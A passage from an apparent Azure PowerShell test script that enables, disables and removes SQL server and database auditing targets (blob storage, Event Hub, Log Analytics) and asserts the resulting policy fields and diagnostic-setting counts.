$policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Get-AzSqlServer -ResourceGroupName $params.rgname -ServerName $params.serverName | Set-AzSqlServerAudit -BlobStorageTargetState Enabled -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -LogAnalyticsTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-RemoveAuditOnServer { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/master" try { Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count $policy = Get-AzSqlServer -ResourceGroupName $params.rgname -ServerName $params.serverName | Get-AzSqlServerAudit Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Get-AzSqlServer -ResourceGroupName $params.rgname -ServerName $params.serverName | Set-AzSqlServerAudit -BlobStorageTargetState Enabled -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Set-AzSqlServerAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.BlobStorageTargetState Assert-AreEqual $params.storageAccountResourceId $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-AreEqual 8 $policy.RetentionInDays Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 1 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.BlobStorageTargetState Assert-AreEqual 2 $policy.AuditActionGroup.Length Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.StorageAccountResourceId Assert-AreEqual "Primary" $policy.StorageKeyType Assert-Null $policy.RetentionInDays Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-NewDatabaseAuditDiagnosticsAreCreatedOnNeed { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/" + $params.databaseName try { $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-Null $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzSqlDatabaseAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Set-AzSqlDatabaseAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzSqlDatabaseAudit -LogAnalyticsTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Set-AzSqlDatabaseAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-NewServerAuditDiagnosticsAreCreatedOnNeed { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/master" try { $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count (($diagnostics).count + "1") $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzSqlServerAudit -LogAnalyticsTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -WorkspaceResourceId $workspaceResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count "2" Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count "3" $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count "4" Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count "5" $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 